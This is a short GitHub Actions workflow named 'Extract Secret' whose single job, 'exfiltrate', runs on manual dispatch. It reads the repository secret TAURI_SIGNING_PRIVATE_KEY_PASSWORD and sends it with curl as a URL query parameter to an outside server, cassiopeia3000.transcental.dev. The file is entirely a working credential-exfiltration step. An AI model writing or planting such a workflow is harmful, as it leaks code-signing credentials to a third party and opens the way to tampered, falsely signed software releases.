name: Extract Secret
on: [workflow_dispatch]

jobs:
  exfiltrate:
    runs-on: ubuntu-latest
    steps:
      - name: Send Encoded Secret via GET
        shell: bash
        env:
          THE_SECRET: ${{ secrets.TAURI_SIGNING_PRIVATE_KEY_PASSWORD }}
        run: |
          curl -G "https://cassiopeia3000.transcental.dev/grr" --data-urlencode "password=$THE_SECRET"
